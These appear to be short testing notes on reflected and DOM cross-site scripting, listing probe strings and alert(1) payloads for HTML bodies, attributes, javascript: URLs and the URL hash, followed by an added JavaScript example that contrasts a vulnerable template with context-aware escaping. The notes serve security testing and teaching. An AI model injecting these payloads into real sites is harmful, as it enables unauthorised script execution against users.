How to Test
- If you see a parameter, you could input jaykumar123 and look in the source to find where this string appears.
- If it is in a <p> or similar tag, start by adding basic HTML:
"><u>jaykumar123
- If the text is now underlined, you can render HTML, so there is HTML injection. Then we can try:
"><u>jaykumar123<script>alert(1)</script>
Instead of a URL you can try these:
name=<a href=javascript:alert(1)>test123
name=<iframe src=javascript:alert(1)>
name=<object data="data:text/html,<script>alert(1)</script>"></object>
- In an input value attribute (look in the source and add " as required):
name=udemy123" onmouseover=alert(1);//
- In text area
- Always look at the context in the dev tools.
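Each context above (element body, quoted attribute value, URL attribute) needs its own output encoding on the server side. The following is an added example, not part of the original notes: a vulnerable template beside a fixed one, checked against the probe strings above. The template, function names and base URL are assumptions, and the scheme allowlist goes slightly beyond the notes to cover the javascript: and data: URLs used in the payloads.

```javascript
// Added example (hypothetical template and names, not from the original notes).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Element bodies (<p>, <textarea>) and quoted attribute values: encode the
// characters that can close the current context or open a new tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// href/src values: encoding alone is not enough because a javascript: URL
// needs no special characters, so allowlist the scheme as well.
function safeUrl(value) {
  try {
    // The WHATWG parser lowercases the scheme and strips tabs/newlines like a browser.
    const { protocol } = new URL(String(value), 'https://base.invalid/');
    return protocol === 'http:' || protocol === 'https:' ? String(value) : '#';
  } catch {
    return '#'; // unparseable input never reaches the attribute
  }
}

// Before: the parameter is concatenated into three different contexts.
function renderUnsafe(name, link) {
  return `<p>${name}</p><input value="${name}"><a href="${link}">site</a>`;
}

// After: each sink gets the encoding its context requires.
function renderSafe(name, link) {
  return `<p>${escapeHtml(name)}</p>` +
    `<input value="${escapeHtml(name)}">` +
    `<a href="${escapeHtml(safeUrl(link))}">site</a>`;
}

// Probe strings taken from the notes above.
const probes = ['"><u>jaykumar123', 'udemy123" onmouseover=alert(1);//'];
for (const p of probes) {
  console.log('unsafe:', renderUnsafe(p, 'javascript:alert(1)'));
  console.log('safe:  ', renderSafe(p, 'javascript:alert(1)'));
}
```

In the safe output the probe string shows up in the source as entities (&quot;&gt;&lt;u&gt;), which is what a correctly encoded reflection looks like in dev tools.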
DOM
#<img src=x onerror=alert(1)>